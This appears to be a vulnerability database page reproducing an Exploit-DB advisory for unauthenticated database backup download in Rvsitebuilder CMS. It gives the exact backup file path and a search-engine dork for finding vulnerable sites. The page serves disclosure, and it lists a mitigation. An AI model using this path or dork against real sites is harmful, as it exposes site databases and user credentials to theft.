header-logo
Suggest Exploit
vendor:
Rvsitebuilder CMS
by:
Hesam Bazvand
7.5
CVSS
HIGH
Database Backup Download
N/A
CWE
Product Name: Rvsitebuilder CMS
Affected Version From: All Version
Affected Version To: All Version
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 / Kali Linux
2020

Rvsitebuilder CMS Database Backup Download

The vulnerability exists in Rvsitebuilder CMS, which allows an attacker to download the database backup file without authentication. The attacker can access the file by sending a request to the URL http://Target/rvsDbBackup.sql.

Mitigation:

The vendor should ensure that the database backup file is not accessible without authentication.
Source

Exploit-DB raw data:

# Exploit Title: Rvsitebuilder CMS Database Backup Download
# Exploit Author: Hesam Bazvand
# Contact: black.king066@gmail.com
# Software Link: http://www.rvsitebuilder.com
# Version: All Version
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : inurl:rvsindex.php & /rvsindex.php?/user/login
 
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

Exploit : 
		Http://Target/rvsDbBackup.sql

Navigation

Suggest Exploit

Services By CQR